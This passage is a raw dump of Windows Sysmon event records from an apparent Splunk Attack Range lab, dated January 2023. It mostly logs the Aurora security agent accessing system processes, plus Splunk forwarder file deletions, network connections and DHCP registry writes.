Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039867Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:14.943{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039866Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:14.940{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039865Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:14.936{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039864Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:14.932{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039863Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:14.931{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039862Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:14.926{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039861Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:14.925{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039860Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:14.924{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039859Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:14.923{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039858Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:14.921{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039857Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:14.413{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039856Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:14.412{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000039855Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:14.294{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6648FF478E0DF15A25B51E2EB9E78E5F,SHA256=FE870B99AC83AA1F2FB5791A5A361C8946854FDDEAFF069926FA9EB4D2BB1479,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015134Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:15.983{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5DCBDB2009DA0FE603F0EB6EEFCC817,SHA256=F0DC7270804134D21688B9FF394DF44CD82FD1EBD28E8F41416AAEDBF04B04A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039881Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:15.353{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E44023631CD6C2AE39BE46C183F9283,SHA256=7B00699F00D88525A1F46E4B98501F893791C9F71A853C3E15E0C6286230F020,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015133Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:14.062{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50040-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000039880Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:15.047{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039879Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:15.046{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E318-63C7-EF05-00000000AF02}5628C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.5351_none_7f0b8fbe21ea4a21\TiWorker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039878Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:15.044{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E318-63C7-EE05-00000000AF02}3480C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039877Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:15.043{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039876Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:15.041{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039875Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:15.041{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039874Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:15.037{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039873Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:15.025{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039872Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:15.010{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 354300x800000000000000039883Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:14.569{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56226-false10.0.1.12-8000- 23542300x800000000000000039882Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:16.426{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F881BEA71444101670C3E52449FFA9D9,SHA256=7EC01980B31ABA5FF0695AA487178E36D9ADD8E11BF053F0E35AAF5778FE3D24,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000015149Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:16.421{E5A8D418-DC43-63C7-0B00-00000000B002}632680C:\Windows\system32\lsass.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015148Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:16.421{E5A8D418-DC43-63C7-0B00-00000000B002}632680C:\Windows\system32\lsass.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000015147Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:17:16.421{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2942d033-154d-4e3a-b412-31d0a08fdcca}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x800000000000000015146Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:17:16.421{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2942d033-154d-4e3a-b412-31d0a08fdcca}\IsServerNapAwareDWORD (0x00000000) 13241300x800000000000000015145Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:17:16.421{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2942d033-154d-4e3a-b412-31d0a08fdcca}\AddressTypeDWORD (0x00000000) 13241300x800000000000000015144Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:17:16.421{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2942d033-154d-4e3a-b412-31d0a08fdcca}\LeaseTerminatesTimeDWORD (0x63c7f15c) 13241300x800000000000000015143Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:17:16.421{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2942d033-154d-4e3a-b412-31d0a08fdcca}\T2DWORD (0x63c7ef9a) 13241300x800000000000000015142Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:17:16.421{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2942d033-154d-4e3a-b412-31d0a08fdcca}\T1DWORD (0x63c7ea54) 13241300x800000000000000015141Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 